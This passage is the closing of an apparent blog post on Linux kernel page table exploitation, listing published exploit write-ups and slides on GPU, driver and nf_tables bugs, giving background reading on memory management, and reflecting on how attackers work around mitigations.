  3. "Flipping Pages: An analysis of a new Linux vulnerability in nf_tables and hardened exploitation techniques" by @notselwyn (2024) (x86_64) exploit write-up that expands on the Dirty Pagetable technique, covers phys KASLR bypass, cache flushing
  4. PageJack (Phrack article, BlackHat slides) (2024) technique overview
  5. GPUAF - Two ways of Rooting All Qualcomm based Android phones (2024) (aarch64) exploit slides
  6. The Way to Android Root: Exploiting Your GPU On Smartphone (2024) (aarch64) exploit slides
  7. CVE-2022-22265 Samsung npu driver (2024) (aarch64) exploit write-up that includes bypasses for Samsung DEFEX
  8. Mali-cious Intent: Exploiting GPU Vulnerabilities (CVE-2022-22706 / CVE-2021-39793) (2025) (aarch64) Mali GPU exploitation; demonstrates injecting hooks and payloads into read-only shared libraries

RE internals and more background reading:

  1. Page Tables - Linux Kernel Docs are a good place to start on fundamentals
  2. Check out my linternals series for rundowns on page allocators and mm basics
  3. A Quick Dive Into The Linux Kernel Page Allocator (2025) is a great look into the kernel's page allocator

Wrapping Up

Boom, we did it! This has been a fun one to write; hopefully it's been, if not a fun, then at least a helpful read for anyone curious about the current trend of page table exploitation.

It's part of the broader cat and mouse game of security research, as mitigations catch up and become more widespread, attackers need to get more creative in bypassing or circumventing them completely. Often, this means going deeper and deeper into the internals. As we've seen, by exploiting page tables and using physical memory addressing, we're essentially able to operate "under" the purview of traditional mitigations, such as the permission accesses done at the virtual address level.

That said, it's not quite the wild west, as, while not widespread, mitigations for these techniques do exist. So I wonder where the next stop will be in this mitigations race!

If you're interested in digging deeper into page table internals, specifically with regards to kernel code and implementation, I'll be touching on that in the next part of my mm series.

As always feel free to @me (on X, Bluesky or less commonly used Mastodon) if you have any questions, suggestions or corrections :)